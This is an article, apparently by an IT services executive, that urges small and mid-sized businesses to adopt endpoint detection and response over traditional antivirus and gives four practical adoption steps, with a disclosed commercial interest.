At the recent IT Nation Secure 2023 event, ConnectWise shared an interesting statistic from Accenture in their opening keynote: “Even though 43% of cyberattacks are aimed at small and mid-sized businesses (SMBs), only 14% of SMBs are prepared to defend their businesses from pervasive cyberthreats.”
It is not surprising in the modern, connected world that smaller companies are being targeted, as malicious actors are now using artificial intelligence (AI) to discover vulnerabilities, modify malware and make very creative phishing campaigns. While AI services such as ChatGPT can help to increase productivity, similar or even the same AI tools are being used by malicious actors to automate attacks. Just a few years ago, it was challenging to imagine SMBs being a primary target for cybercriminals. In contrast, it has become so easy for attackers today that malware and ransomware threats on SMBs have become the norm.
Drawbacks Of Standard Antivirus Protection
It is hard to imagine a business not using essential antivirus protection—especially now, when free built-in solutions like Windows Defender offer a reasonable level of protection against malware. However, traditional antiviruses can have significant limitations.
• Limited Detection Capabilities: Traditional antiviruses are focused on detecting malware on a computer, using a database of known threats (signatures) and behavioral analysis. However, modern attacks are becoming increasingly sophisticated, and attackers mask malware activity, using fileless malware or even legitimate tools like remote desktop access to infiltrate networks and endpoints and steal data.
• Reactive Protection: Antiviruses are designed to detect and block malware running on a machine. It may be too late in many cases, and the attacks should be discovered and prevented before the malware is deployed.
• Limited Capability For Investigations: After a cyberattack, it is important to investigate how the attack happened and how similar attacks can be prevented. Traditional antiviruses allow collecting information about the malware but often do not provide data to explore how the malware got deployed to a system.
Understanding EDR
The solution that I have found best satisfies the needs of modern businesses is endpoint detection and response (EDR). EDR is an integrated cybersecurity technology designed to protect computers (endpoints) by continuously monitoring activity on the endpoints, alerting administrators about suspicious events, and offering automated or semi-automated remediation to prevent threats or provide recovery solutions from an attack. An EDR solution can allow IT professionals to discover and remediate an attack, run an investigation in a matter of minutes, and prevent future attacks from happening. Frequently, EDR is paired with a backup or disaster recovery solution to ensure business continuity in case of catastrophic events, as one of the remediation actions could be the system’s recovery from a previously healthy state.
EDR solutions include several benefits:
• Proactive Threat Hunting: EDR proactively detects threats by continuously monitoring endpoint and network behavior and identifying anomalies that may indicate a security threat.
• Enhanced Visibility: EDR provides enhanced visibility into endpoints, offering insights into what’s happening on the device in real time.
• Automated Response: EDR solutions can automatically respond to detected threats, significantly reducing the response time and mitigating potential damage.
• Advanced Analytics: EDR systems leverage advanced analytics, including AI, to detect unusual patterns and behaviors that could indicate a threat.
EDR Challenges
The term EDR was coined by Gartner’s Dr. Anton Chuvakin in 2013, and EDR solutions have been on the market for over a decade. Yet despite its maturity, EDR has not been widely adopted by SMBs, primarily due to high costs and a lack of security expertise. Managing an EDR solution can be a daunting task for an IT team; EDR solutions collect and process enormous numbers of events and generate various alerts and notifications, which IT teams must attend to on top of their usual day-to-day tasks of managing IT infrastructure and handling support tickets from the users. This is why managing the notifications and analyzing events typically requires significant time from specially trained individuals.
However, in recent years, EDR solutions have become more accessible to MSPs and easier to use with less technological knowledge needed. And as cyberattacks become more prevalent, I believe SMB leaders should consider employing EDR technology.
How SMBs And IT Teams Can Employ EDR Solutions
1. Allocate time for cybersecurity training. Continuous education for IT professionals is critical, as IT and cybersecurity knowledge keeps becoming outdated rapidly. Therefore, business owners and IT managers must allocate time for the training and certification of IT professionals. Vendor certifications in EDR can be a good start.
2. Find an EDR solution that offers maximum automation. Critical criteria for effect EDR include the ability to automate the processing of events and alerts, offer guidance for resolving issues, and be flexible in setting filters for alerts and actions, to reduce the human workloads required.
3. Integrate and automate. Implement integration with identity providers and other company security solutions, like email security or firewalls. Minimize the number of separate tools to be managed so as to reduce the IT professional workload.
4. Partner with a managed service provider (MSP) specializing in cybersecurity. In some cases, it may be a more reliable and economical solution to use a company with the resources, expertise and experience working with EDR solutions for SMB companies. (Full disclosure: My company offers these services, as do others.) Even if you don’t currently have the technical talent available or your in-house team can’t accommodate the additional workload, there are many service providers who can deliver this service.
In Conclusion
The landscape of EDR solutions has seen a significant transformation and revolution recently. Advances in AI help to automate security analysis, filtering out benign events and providing only the most important information to IT administrators. Managing EDR solutions no longer requires much advanced training, and even smaller MSPs can offer these services to their customers. Overall, I believe that using EDR is not just a recommendation anymore—it is an essential requirement for survival in today’s digital world.